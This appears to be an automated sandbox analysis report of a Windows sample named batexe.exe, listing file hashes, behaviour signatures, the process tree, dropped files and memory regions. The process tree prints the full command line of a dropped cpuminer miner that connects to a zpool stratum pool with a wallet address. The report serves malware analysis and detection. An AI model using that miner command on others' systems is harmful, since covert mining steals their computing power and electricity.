Analysis

  • max time kernel
    293s
  • max time network
    294s
  • platform
    windows10-1703_x64
  • resource
    win10-20240214-ja
  • resource tags

    arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    21/02/2024, 04:55

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:872
    • C:\Users\Admin\AppData\Local\Temp\98A6.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\98A6.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\98A6.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4804
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9AC9.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4340
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:4848

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\98A6.tmp\b2e.exe

          Filesize

          4.8MB

          MD5

          b18112e281e13cb33d879005068e4ee4

          SHA1

          98a617521104c95a0641e94a7f3a1b87c7ed92f9

          SHA256

          0cee6457ac7b6f692044cd56a8e60d320ab387e49501ee3e34a1f0bfd162b47b

          SHA512

          9c76b479845451e801f2ea363d72d6bfe05c57da9766661fd319136186191ced340664e8895503156860256fe1046ec870a439489cabb28bded23d7a638c75d5

        • C:\Users\Admin\AppData\Local\Temp\98A6.tmp\b2e.exe

          Filesize

          5.5MB

          MD5

          ee1d005b914e2fe139810b77a48e345a

          SHA1

          66f210cee1793048e320e550944c8d0dbbcc0ccf

          SHA256

          85d09def463142c31ad2a1521b46122dc59e6f7d5e2eec1466cbc118a8870c11

          SHA512

          309afc5d41cb682e9d3b4a267ae75a8ce6a69c3a295af08c99831a4fe8d6138808daa3cf936a484cacaf82f43761bc4444bdea54dff796c90ebd8a30a78ee856

        • C:\Users\Admin\AppData\Local\Temp\9AC9.tmp\batchfile.bat

          Filesize

          136B

          MD5

          8ea7ac72a10251ecfb42ef4a88bd330a

          SHA1

          c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

          SHA256

          65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

          SHA512

          a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          1.7MB

          MD5

          665e0327f7261623fa741cda77fa272a

          SHA1

          57fd2950fd4645598785b0f473a75d133bb42367

          SHA256

          a6de9063eb10cac92d6b987bde9977187925ef9ec0cc1ff461f0d64aeea83138

          SHA512

          b5ac2fe1aeaf89d27806d9b638feb8dbb24c0d1381306537ef59326d7b226b6654047ab1aeedbc7680821fb7d4c65a0b2aa1bf75d0a86f1e1db00b545f0ca056

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          2.1MB

          MD5

          9ece4d1c669433e58735a84650d77eef

          SHA1

          4178b0463146fafa7ed17a8a254e6f2cac2b9ac0

          SHA256

          13a0c506b4081f41d30b8e671745ec60e929bd65d8961f07397cc0d42e6a7afa

          SHA512

          0f17bed984c224ddd9660444a70f889b7d21fe1d0514a688fb4db51f817a56e536dd40a21425e139f3e3bd13998e4a0c26532dddcb2483f8ecdbb56ad07c8fbd

        • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          1.2MB

          MD5

          7cf672bee2afba2dcd0c031ff985958e

          SHA1

          6b82a205db080ffdcb4a4470fce85a14413f3217

          SHA256

          c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

          SHA512

          3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          1.8MB

          MD5

          dc8b930f8951049dda843515d036884a

          SHA1

          694268dc9c827be782d6ee872841848d06e4e1d8

          SHA256

          4e7ab4bdb0af15adb6028b6a5a44c63a6a3cc7d0cc6e9624d9c3f432784feb54

          SHA512

          f83b32dc45c46ee417901cef0ef12664d584a282911f84ebb6e8a248214f2f15dd9f9f9c94cdb1e00435dc2db2b3177db3e7dca0ee29941e9906d16a3b1aada9

        • \Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          836KB

          MD5

          aeab40ed9a8e627ea7cefc1f5cf9bf7a

          SHA1

          5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

          SHA256

          218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

          SHA512

          c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

        • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          1.9MB

          MD5

          1617131fdd0b29d9d6f2ce1fd7af0601

          SHA1

          3daf4801490d6730774effcd869898844ecb8382

          SHA256

          8ba811fea6411cdac3d1b82986c5caa8bf38f5caa7094a128297974dd5386a1a

          SHA512

          e85b94d1fd8ecc69bb812ff74717f6b42e8bee1e9106a114ea3089cccecf4cb680bf90997fe08133f7182b03d5f068b4d9058ac52f75c1c0869cde0ae6b6937c

        • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          1.9MB

          MD5

          77c74e0a31e537480970d3df9da2b834

          SHA1

          577192a45be1b30d81dd8f385a7dffa0a28bbac7

          SHA256

          da0119af3876b862208cf2c945c59a7c9290ec5bc370d5b01a1123524ace2385

          SHA512

          462506a63e7e77e09134c20ed4aea0e1e086bba259aff699d879c7b1abffa7edb1a0bb48df1ca4a0bda7ab2f7b1a15b9f19425e773466ba97ceb8e0e4b3fd663

        • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

          Filesize

          606KB

          MD5

          585efec1bc1d4d916a4402c9875dff75

          SHA1

          d209613666ccac9d0ddab29a3bc59aa00a0968fa

          SHA256

          2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

          SHA512

          b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

        • memory/872-6-0x0000000000400000-0x000000000393A000-memory.dmp

          Filesize

          53.2MB

        • memory/4804-5-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB

        • memory/4804-50-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB

        • memory/4848-44-0x0000000001080000-0x0000000002935000-memory.dmp

          Filesize

          24.7MB

        • memory/4848-43-0x000000006E860000-0x000000006E8F8000-memory.dmp

          Filesize

          608KB

        • memory/4848-40-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4848-42-0x0000000061440000-0x000000006156B000-memory.dmp

          Filesize

          1.2MB

        • memory/4848-45-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4848-41-0x0000000070800000-0x00000000708BC000-memory.dmp

          Filesize

          752KB

        • memory/4848-56-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4848-61-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4848-66-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4848-71-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4848-81-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4848-86-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/4848-91-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB